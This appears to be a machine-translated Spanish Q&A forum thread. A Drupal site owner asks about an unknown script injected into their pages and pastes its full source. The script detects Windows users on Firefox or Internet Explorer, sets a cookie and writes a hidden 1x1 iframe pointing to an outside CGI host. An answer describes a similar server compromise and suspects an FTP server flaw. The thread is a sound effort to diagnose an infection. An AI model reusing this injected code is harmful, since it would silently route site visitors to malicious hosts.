¿Por qué aparece el script "103fm" en el sitio web de Drupal?

Question

Duplicar posible:
Weird Script Appearing In My Website's DOM

acabo notó un guión extraño corriendo en mi sitios web DOM. Estoy corriendo DRUPAL. El script es http://www.103fm.net/release.js. No sé por dónde empezar a buscar este guion deshonesto. Mi sitio web es miloads.com y solo aparece en los menús de administración. Lo extraño es el archivo no existe en 103fm.net, pero en realidad se carga el siguiente script:

var BrowserDetect = { 
init: function() { 
this.browser = this.searchString(this.dataBrowser) || "An unknown browser"; 
this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || "an unknown version"; 
this.OS = this.searchString(this.dataOS) || "an unknown OS"; 
}, 
searchString: function(data) { 
for (var i = 0; i < data.length; i++) { 
var dataString = data[i].string; 
var dataProp = data[i].prop; 
this.versionSearchString = data[i].versionSearch || data[i].identity; 
if (dataString) { 
if (dataString.indexOf(data[i].subString) != -1) 
return data[i].identity; 
} else if (dataProp) 
return data[i].identity; 
} 
}, 
searchVersion: function(dataString) { 
var index = dataString.indexOf(this.versionSearchString); 
if (index == -1) 
return; 
return parseFloat(dataString.substring(index + this.versionSearchString.length + 1)); 
}, 
dataBrowser: [{ 
string: navigator.userAgent, 
subString: "Firefox", 
identity: "Firefox" 
}, { 
string: navigator.userAgent, 
subString: "MSIE", 
identity: "Explorer", 
versionSearch: "MSIE" 
}], 
dataOS: [{ 
string: navigator.platform, 
subString: "Win", 
identity: "Windows" 
}] 
}; 
function addCookie(szName, szValue, dtDaysExpires) { 
var dtExpires = new Date(); 
var dtExpiryDate = ""; 
dtExpires.setTime(dtExpires.getTime() + dtDaysExpires * 24 * 60 * 60 * 1000); 
dtExpiryDate = dtExpires.toGMTString(); 
document.cookie = szName + "=" + szValue + ";expires=" + dtExpiryDate; 
} 
function findCookie(szName) { 
var i = 0; 
var nStartPosition = 0; 
var nEndPosition = 0; 
var szCookieString = document.cookie; 
while (i <= szCookieString.length) { 
nStartPosition = i; 
nEndPosition = nStartPosition + szName.length; 
if (szCookieString.substring(nStartPosition, nEndPosition) == szName) { 
nStartPosition = nEndPosition + 1; 
nEndPosition = document.cookie.indexOf(";", nStartPosition); 
if (nEndPosition < nStartPosition) 
nEndPosition = document.cookie.length; 
return document.cookie.substring(nStartPosition, nEndPosition); 
break; 
} 
i++; 
} 
return ""; 
} 
BrowserDetect.init(); 
var szCookieString = document.cookie; 
var stopit = BrowserDetect.browser; 
var os = BrowserDetect.OS; 
if (((stopit == "Firefox" || stopit == "Explorer") && (os == "Windows")) && (findCookie('geo_id2') != '753445')) { 
addCookie("geo_id2", "753445", 1); 
document.write("<if" + "rame name='info' src='http://www.ztanalytics.com/stat.cgi?s_id=1' width=1 height=1 scrolling=no frameborder=0></if" + "rame>"); 
} else {} 

Answer 1

Del mismo modo, el servidor de nuestro cliente se ha visto comprometida la noche anterior, por direcciones IP en Rumania, República Checa y Polonia . Estos procesos aparentemente automatizados parecen inyectar una etiqueta de script en la parte superior de la etiqueta de cuerpo. Este script parece generar una cookie en máquinas Windows que ejecutan Firefox e IE. A continuación, abre un iframe y ejecuta un script CGI que se ejecuta en un sitio alojado en Rusia.

Afortunadamente, la última versión de Firefox ni siquiera cargará el script; IE sin embargo lo hace.

Chrome (a pesar de no verse afectado) ni siquiera le permitirá visitar la página en la que esto sucedió.

Como todos los informes que puedo encontrar de esto han sucedido recientemente, podría ser una vulnerabilidad de software, en lugar de contraseñas comprometidas: qué servidor FTP está ejecutando (conéctese al servidor con su cliente FTP y la consola debería decirte). El servidor en cuestión ejecuta ProFTPd 1.3.1.

Si el software es común, se debe informar a los creadores.